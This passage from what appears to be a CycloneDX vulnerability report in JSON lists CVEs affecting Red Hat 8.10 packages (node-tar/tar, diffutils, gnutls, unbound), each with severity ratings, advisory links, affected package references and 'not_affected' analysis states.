          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-53655",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"
        }
      ],
      "cwes": [
        436
      ],
      "description": "node-tar is a full-featured Tar for Node.js. Prior to 7.5.16, tar (node-tar) applies a PAX extended header's size= record (and other PAX overrides) to the next header entry of any type, including intermediary metadata headers such as a GNU long-name (L) or long-link (K) entry. Per POSIX pax, a PAX extended header (x) describes the next file entry, not the intermediary extension headers that may sit between the x header and the file it annotates. Because node-tar lets the PAX size override the byte length of an intervening L/K/x header, an attacker can desynchronize node-tar's stream cursor relative to every other mainstream tar implementation (GNU tar, libarchive/bsdtar, Python tarfile, and the now-fixed tar-rs / astral-tokio-tar). The result is a tar parser interpretation differential (CWE-436): a single crafted archive yields a different set of members under node-tar than under the reference tar tools. An attacker can use this to hide a member from one parser while it is visible to another, which defeats security tooling whose scanner and extractor disagree on archive contents (e.g. a malware/secret scanner that lists entries with one library while a downstream step extracts with another) This vulnerability is fixed in 7.5.16.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-53655"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-53655"
        },
        {
          "url": "https://github.com/isaacs/node-tar"
        },
        {
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-vmf3-w455-68vh"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53655"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-53655"
        }
      ],
      "published": "2026-06-22T16:16:38+00:00",
      "updated": "2026-06-26T20:03:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-53910",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        190
      ],
      "description": "diff3\u00a0tool from GNU diffutils\u00a0is vulnerable to a heap\u2011based buffer overflow due to multiple signed integer overflows in line\u2011mapping calculations. Incorrect arithmetic in mapping line ranges can result in corrupted values being used for memory allocation and loop bounds.\nWhen processing crafted diff output, these overflows may cause the application to allocate insufficient memory and subsequently perform out\u2011of\u2011bounds writes during internal processing.\u00a0\nAn attacker who can control the output of the diff program used by diff3 (e.g. via --diff-program pointing to a malicious script) can trigger out-of-bounds writes, resulting in a crash and potentially remote code execution depending on the environment.\n\n\nThis issue has been fixed in commit 9ff04d5b84743e331e80b589335a52c5480d1815\u00a0\n\nNOTE:\nThe project maintainers claim that this is not a security issue. They state that the worst outcome this issue can cause is a crash of diff and that it cannot be used to escalate privileges.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-53910"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-53910"
        },
        {
          "url": "https://cert.pl/en/posts/2026/07/CVE-2026-53910"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/diffutils.git/commit/?id=73ed7ce85cc78effb94daf028c9af6b4e5252e50"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/diffutils.git/commit/?id=9ff04d5b84743e331e80b589335a52c5480d1815"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/diffutils.git/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53910"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-53910"
        }
      ],
      "published": "2026-07-22T14:17:21+00:00",
      "updated": "2026-07-27T12:16:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6-6.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/diffutils@3.6-6.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-5419",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        208
      ],
      "description": "A flaw was found in gnutls. The PKCS#7 padding check, performed during decryption, was not constant-time. This timing side-channel could allow a remote attacker to potentially leak sensitive information about the padding bytes through observable timing differences. This vulnerability is a form of information disclosure.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5419"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:13274"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20612"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:20613"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26319"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26409"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:29197"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:30004"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:32962"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5419"
        },
        {
          "url": "https://bugzilla.redhat.com/2445763"
        },
        {
          "url": "https://bugzilla.redhat.com/2450624"
        },
        {
          "url": "https://bugzilla.redhat.com/2450625"
        },
        {
          "url": "https://bugzilla.redhat.com/2467279"
        },
        {
          "url": "https://bugzilla.redhat.com/2467289"
        },
        {
          "url": "https://bugzilla.redhat.com/2467437"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445762"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450624"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450625"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467279"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467289"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467437"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467441"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467451"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467678"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467686"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33845"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33846"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3832"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3833"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42009"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42015"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5260"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-5419"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-20613.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:20612"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-5419.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50346.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5419"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8284-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5419"
        },
        {
          "url": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2026-04-29-13"
        }
      ],
      "published": "2026-06-01T21:16:47+00:00",
      "updated": "2026-07-22T08:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.16-8.el8_10.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/gnutls@3.6.16-8.el8_10.6?arch=x86_64&distro=redhat-8.10"
        },
        {
